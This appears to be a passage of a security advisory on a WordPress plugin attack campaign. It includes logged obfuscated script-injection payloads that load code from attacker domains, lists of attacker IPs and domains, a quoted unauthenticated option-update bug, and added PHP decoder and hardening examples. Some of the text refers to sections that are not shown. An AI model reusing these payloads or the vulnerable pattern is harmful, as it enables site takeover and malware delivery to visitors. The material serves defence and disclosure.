192.169.157.142 - - [23/Jul/2019] "GET /wp-admin/admin-ajax.php?action=mk_file_folder_manager&_wpnonce=1589e1018d&cmd=open&target=&init=1&tree=1&_=1535229962392 HTTP/1.1"

Appointment Booking Calendar

192.169.157.142 - CP_ABC_post_edition=1&cfwpp_edit=js&editionarea=var+nt+%3D+String.fromCharCode%2857%29%3Bvar+mb+%3D+String.fromCharCode%2897%2C+106%2C+97%2C+120%2C+67%2C+111%2C+117%2C+110%2C+116%2C+101%2C+114%29%3Bvar+sb+%3D+String.fromCharCode%28115%2C+99%2C+114%2C+105%2C+112%2C+116%29%3Bvar+jb+%3D+String.fromCharCode%28104%2C+116%2C+116%2C+112%2C+115%2C+58%2C+47%2C+47%29%3B+var+tb+%3D+String.fromCharCode%28116%2C+101%2C+120%2C+116%2C+47%2C+106%2C+97%2C+118%2C+97%2C+115%2C+99%2C+114%2C+105%2C+112%2C+116%29%3Bvar+lb+%3D+String.fromCharCode%28103%2C+114%2C+101%2C+97%2C+116%2C+102%2C+97%2C+99%2C+101%2C+98%2C+111%2C+111%2C+107%2C+112%2C+97%2C+103%2C+101%2C+46%2C+99%2C+111%2C+109%2C+47%2C+100%2C+108%2C+116%2C+111%2C+46%2C+106%2C+115%2C+63%2C+116%2C+61%2C+112%2C+38%2C+97%2C+61%29%3Bvar+c%3Ddocument.createElement%28sb%29%3Bc.type%3Dtb%2Cc.async%3D1%2Cc.src%3Djb%2Blb%2Bnt%3Bvar+n%3Ddocument.getElementsByTagName%28sb%29%5B0%5D%3Bn.parentNode.insertBefore%28c%2Cn%29%3B&save=Submit [26/Jul/2019:] "POST /wp-admin/admin-post.php HTTP/1.1"

Folders

192.169.157.142 - type=attachment&width=%3C%2Fstyle%3E%3Cscript++async%3Dtrue+type%3Dtext%2Fjavascript+language%3Djavascript%3Evar+nt+%3D+String.fromCharCode%2857%29%3Bvar+mb+%3D+String.fromCharCode%2897%2C+106%2C+97%2C+120%2C+67%2C+111%2C+117%2C+110%2C+116%2C+101%2C+114%29%3Bvar+sb+%3D+String.fromCharCode%28115%2C+99%2C+114%2C+105%2C+112%2C+116%29%3Bvar+jb+%3D+String.fromCharCode%28104%2C+116%2C+116%2C+112%2C+115%2C+58%2C+47%2C+47%29%3B+var+tb+%3D+String.fromCharCode%28116%2C+101%2C+120%2C+116%2C+47%2C+106%2C+97%2C+118%2C+97%2C+115%2C+99%2C+114%2C+105%2C+112%2C+116%29%3Bvar+lb+%3D+String.fromCharCode%28103%2C+114%2C+101%2C+97%2C+116%2C+102%2C+97%2C+99%2C+101%2C+98%2C+111%2C+111%2C+107%2C+112%2C+97%2C+103%2C+101%2C+46%2C+99%2C+111%2C+109%2C+47%2C+100%2C+108%2C+116%2C+111%2C+46%2C+106%2C+115%2C+63%2C+116%2C+61%2C+112%2C+38%2C+97%2C+61%29%3Bvar+c%3Ddocument.createElement%28sb%29%3Bc.type%3Dtb%2Cc.async%3D1%2Cc.src%3Djb%2Blb%2Bnt%3Bvar+n%3Ddocument.getElementsByTagName%28sb%29%5B0%5D%3Bn.parentNode.insertBefore%28c%2Cn%29%3B%3C%2Fscript%3E%3Cstyle%3E [26/Jul/2019] "POST /wp-admin/admin-ajax.php?action=wcp_change_post_width HTTP/1.1"

Simple Staff List

192.169.157.142 - _staff_listing_default_css=%3C%2Fstyle%3E%3Cscript++async%3Dtrue+type%3Dtext%2Fjavascript+language%3Djavascript%3Evar+nt+%3D+String.fromCharCode%2857%29%3Bvar+mb+%3D+String.fromCharCode%2897%2C+106%2C+97%2C+120%2C+67%2C+111%2C+117%2C+110%2C+116%2C+101%2C+114%29%3Bvar+sb+%3D+String.fromCharCode%28115%2C+99%2C+114%2C+105%2C+112%2C+116%29%3Bvar+jb+%3D+String.fromCharCode%28104%2C+116%2C+116%2C+112%2C+115%2C+58%2C+47%2C+47%29%3B+var+tb+%3D+String.fromCharCode%28116%2C+101%2C+120%2C+116%2C+47%2C+106%2C+97%2C+118%2C+97%2C+115%2C+99%2C+114%2C+105%2C+112%2C+116%29%3Bvar+lb+%3D+String.fromCharCode%28103%2C+114%2C+101%2C+97%2C+116%2C+102%2C+97%2C+99%2C+101%2C+98%2C+111%2C+111%2C+107%2C+112%2C+97%2C+103%2C+101%2C+46%2C+99%2C+111%2C+109%2C+47%2C+100%2C+108%2C+116%2C+111%2C+46%2C+106%2C+115%2C+63%2C+116%2C+61%2C+112%2C+38%2C+97%2C+61%29%3Bvar+c%3Ddocument.createElement%28sb%29%3Bc.type%3Dtb%2Cc.async%3D1%2Cc.src%3Djb%2Blb%2Bnt%3Bvar+n%3Ddocument.getElementsByTagName%28sb%29%5B0%5D%3Bn.parentNode.insertBefore%28c%2Cn%29%3B%3C%2Fscript%3E%3Cstyle%3E [26/Jul/2019] "POST /wp-admin/admin-post.php?action=save&updated=true HTTP/1.1"

Mobile App

192.169.157.142 - canvas_editor_css=%3C%2Fstyle%3E%3Cscript++async%3Dtrue+type%3Dtext%2Fjavascript+language%3Djavascript%3Evar+nt+%3D+String.fromCharCode%2857%29%3Bvar+mb+%3D+String.fromCharCode%2897%2C+106%2C+97%2C+120%2C+67%2C+111%2C+117%2C+110%2C+116%2C+101%2C+114%29%3Bvar+sb+%3D+String...skipped...99%2C+101%2C+98%2C+111%2C+111%2C+107%2C+112%2C+97%2C+103%2C+101%2C+46%2C+99%2C+111%2C+109%2C+47%2C+100%2C+108%2C+116%2C+111%2C+46%2C+106%2C+115%2C+63%2C+116%2C+61%2C+112%2C+38%2C+97%2C+61%29%3Bvar+c%3Ddocument.createElement%28sb%29%3Bc.type%3Dtb%2Cc.async%3D1%2Cc.src%3Djb%2Blb%2Bnt%3Bvar+n%3Ddocument.getElementsByTagName%28sb%29%5B0%5D%3Bn.parentNode.insertBefore%28c%2Cn%29%3B%3C%2Fscript%3E%3Cstyle%3E&ssn_submit=1 [26/Jul/2019] "POST /wp-admin/admin-post.php HTTP/1.1"

Malicious Domains and IPs:

IPs:

192.169.157.142
185.225.16.152
178.128.57.173
185.238.0.146
185.238.0.135
45.12.32.55 
185.238.0.133
185.238.0.132
45.12.32.56
185.238.0.146
45.67.229.126
192.232.194.4

Domains Injected:

  • greatfacebookpage[.]com
  • greatinstagrampage[.]com
  • destroyforme[.]com

As always, we strongly encourage you to keep your software up to date to prevent infection. You can add a WAF as a second layer of protection to virtually patch these vulnerabilities.
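The logged payloads in the monthly "Plugin Payloads Added to the Campaign" sections above (October back to July) stack the same encoding layers: URL encoding (%3C), HTML entities (&lpar;, &#x64;) and String.fromCharCode number lists that assemble the script URL at runtime. The PHP below is an added example, not code from this page's author; it peels those layers off one logged request and reports which hosts an injected script would load from, so a defender can match them against the "Domains Injected" lists. The log line, the 203.0.113.5 source address and the cdn.example.invalid blocklist entry are constructed placeholders.

```php
<?php
// Added example (not from this page's author). Decodes the layers the campaign
// uses and reports injected script hosts. Sample line and blocklist are constructed.

function decode_payload_layers(string $s): string {
    // Layer 1: URL decoding ("+" becomes a space, %3C becomes "<").
    $s = urldecode($s);
    // Layer 2: HTML entities. Only complete "&name;" / "&#x..;" forms are decoded,
    // so ordinary query separators such as "&notify=1" are left untouched.
    $s = preg_replace_callback('/&#?[A-Za-z0-9]+;/', function (array $m): string {
        return html_entity_decode($m[0], ENT_QUOTES | ENT_HTML5, 'UTF-8');
    }, $s);
    // Layer 3: String.fromCharCode(104,116,...) rebuilt into the text it yields.
    return preg_replace_callback('/String\.fromCharCode\(\s*([0-9,\s]+?)\s*\)/', function (array $m): string {
        $out = '';
        foreach (explode(',', $m[1]) as $code) {
            $code = trim($code);
            if ($code !== '') {
                $out .= chr((int) $code);
            }
        }
        return $out;
    }, $s);
}

function extract_script_hosts(string $decoded): array {
    $hosts = [];
    // Any absolute URL left after decoding is a candidate payload source.
    if (preg_match_all('~https?://[A-Za-z0-9.-]+\.[A-Za-z]{2,}[^\s\'";<>)]*~', $decoded, $m)) {
        foreach ($m[0] as $url) {
            $host = parse_url($url, PHP_URL_HOST);
            if ($host !== null && $host !== false) {
                $hosts[] = strtolower($host);
            }
        }
    }
    return array_values(array_unique($hosts));
}

function analyse_log_line(string $line, array $blocked_hosts): array {
    $decoded = decode_payload_layers($line);
    $hosts   = extract_script_hosts($decoded);
    // The campaign drives every payload through these two entry points.
    $admin_entry   = (bool) preg_match('~/wp-admin/admin-(?:ajax|post)\.php~', $line);
    // Injection vehicles seen on the page: <script>, <svg onload>, data:text/javascript.
    $script_inject = (bool) preg_match('/<script|<svg[^>]*onload|data:text\/javascript/i', $decoded);
    return [
        'admin_entrypoint' => $admin_entry,
        'script_injected'  => $script_inject,
        'script_hosts'     => $hosts,
        'known_bad_hosts'  => array_values(array_intersect($hosts, $blocked_hosts)),
        'suspicious'       => $admin_entry && $script_inject,
    ];
}

// Constructed sample: a Blog-Designer-style settings save whose custom_css field
// closes the <style> block and loads a script from a fromCharCode-assembled URL.
$sample_line = '203.0.113.5 - action=save&custom_css=%3C%2Fstyle%3E%3Cscript+type%3Dtext%2Fjavascript%3E'
    . 'var+e%3Ddocument.createElement%28%27script%27%29%3Be.src%3DString.fromCharCode%28'
    . '104%2C116%2C116%2C112%2C115%2C58%2C47%2C47%2C99%2C100%2C110%2C46%2C101%2C120%2C97%2C109'
    . '%2C112%2C108%2C101%2C46%2C105%2C110%2C118%2C97%2C108%2C105%2C100%2C47%2C97%2C46%2C106%2C115%29'
    . '%3Bdocument.head.appendChild%28e%29%3B%3C%2Fscript%3E%3Cstyle%3E&updated=true'
    . ' [08/Oct/2019:12:54:03 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1"';

// Placeholder standing in for the page's "Domains Injected" lists.
$blocklist = ['cdn.example.invalid'];

echo json_encode(analyse_log_line($sample_line, $blocklist), JSON_PRETTY_PRINT), "\n";
```

Run it with the PHP CLI against one line at a time (for a whole access log, loop over the file and keep the records where `suspicious` is true). The entity step is deliberately limited to terminated entities because the logged bodies carry the attackers' `&lpar;`-style entities raw alongside ordinary `&key=value` separators, and a blanket html_entity_decode() would also rewrite legacy entities such as `&not` inside parameter names.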

WPTF Hybrid Composer – Unauthenticated Arbitrary Options Update

With almost 300 installs, WPTF - Hybrid Composer is a framework that helps users easily create custom themes for WordPress. We recently noticed an increase in suspicious requests, revealing an attack against this plugin.

Easily automated vulnerabilities are the first choice for bad actors. The following snippet is a good example of why attackers would target it:

function hc_ajax_save_option() {
    echo update_option($_POST['option_name'], $_POST['content']);
    die();
}

add_action('wp_ajax_nopriv_hc_ajax_save_option', 'hc_ajax_save_option');

The function “hc_ajax_save_option” calls the WordPress update_option() with two parameters that come directly from user input. Because the developers register “hc_ajax_save_option” on the nopriv AJAX hook (wp_ajax_nopriv_), which runs for logged-out visitors, unauthenticated bad actors can obtain full access.

For those who don’t know, WordPress’ update_option() function is used to update any option in the options database table. Using this function, an attacker can gain admin access or inject arbitrary data into any site running a vulnerable version of this framework (1.4.6 and lower).

The developer is aware of this vulnerability. It was patched in a recent update, and we strongly encourage users to update their plugin if they haven’t already.
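The three bugs described on this page (the admin_init-driven settings code in woocommerce-ajax-filters, lolmi_save_settings in Login or Logout Menu Item, and hc_ajax_save_option in WPTF Hybrid Composer) are one defect in three forms: update_option() reachable without a capability check, without a nonce, and without any restriction on which option is written. The PHP below is an added example, not code from any of those plugins; the plugin slug myplugin, its option names and its form are hypothetical. The first handler reproduces the shared pattern; the second is the shape a settings save should take.

```php
<?php
// Added example (not code from any plugin on this page). "myplugin" and its
// option names are hypothetical.

// --- The shared vulnerable pattern ---------------------------------------
// admin_init fires for admin-ajax.php and admin-post.php as well as for admin
// screens, and is_admin() is true for those requests too, so a handler hooked
// here runs for anyone who can reach /wp-admin/. Option name and value are
// taken straight from the request, exactly as hc_ajax_save_option() does.
function myplugin_save_option_vulnerable() {
    if ( isset( $_POST['myplugin_submit'] ) ) {
        update_option( $_POST['option_name'], $_POST['content'] );
    }
}
add_action( 'admin_init', 'myplugin_save_option_vulnerable' );

// --- Hardened version ----------------------------------------------------
// Option names the handler may write, each mapped to the sanitiser for its type.
const MYPLUGIN_ALLOWED_OPTIONS = array(
    'myplugin_redirect_url' => 'esc_url_raw',       // must be a URL
    'myplugin_custom_css'   => 'wp_strip_all_tags', // CSS text, no markup
);

// Settings form: posts to admin-post.php with an action and a nonce field.
function myplugin_settings_form() {
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'admin-post.php' ) ); ?>">
        <input type="hidden" name="action" value="myplugin_save_option" />
        <?php wp_nonce_field( 'myplugin_save_option', 'myplugin_nonce' ); ?>
        <input type="hidden" name="option_name" value="myplugin_redirect_url" />
        <input type="text" name="content"
               value="<?php echo esc_attr( get_option( 'myplugin_redirect_url', '' ) ); ?>" />
        <input type="submit" class="button button-primary" value="Save" />
    </form>
    <?php
}

function myplugin_save_option_hardened() {
    // 1. Capability: only users allowed to manage options, checked first.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'You are not allowed to change these settings.', 403 );
    }
    // 2. Nonce: the request must originate from the form rendered above.
    check_admin_referer( 'myplugin_save_option', 'myplugin_nonce' );

    // 3. Allowlist: the option name is never taken from the request as-is.
    $name = isset( $_POST['option_name'] ) ? sanitize_key( $_POST['option_name'] ) : '';
    if ( ! array_key_exists( $name, MYPLUGIN_ALLOWED_OPTIONS ) ) {
        wp_die( 'Unknown option.', 400 );
    }

    // 4. Sanitise the value according to the option's declared type.
    $sanitize = MYPLUGIN_ALLOWED_OPTIONS[ $name ];
    $value    = isset( $_POST['content'] ) ? $sanitize( wp_unslash( $_POST['content'] ) ) : '';

    update_option( $name, $value );
    wp_safe_redirect( add_query_arg( 'updated', 'true', wp_get_referer() ) );
    exit;
}
// admin_post_{action} runs only for logged-in users. The admin_post_nopriv_ and
// wp_ajax_nopriv_ variants are deliberately not registered for this handler.
add_action( 'admin_post_myplugin_save_option', 'myplugin_save_option_hardened' );
```

Two points a reviewer would still raise. esc_url_raw() keeps any well-formed URL, so an administrator-level account can still point myplugin_redirect_url off-site; if the redirect is meant to stay on the current site, validate it with wp_validate_redirect() before saving. And the allowlist is what closes the "arbitrary options update" class: without it, a capability and nonce check still lets a legitimately logged-in editor of the form write options such as users_can_register, which the Kiwi-Social-Share payload on this page targets.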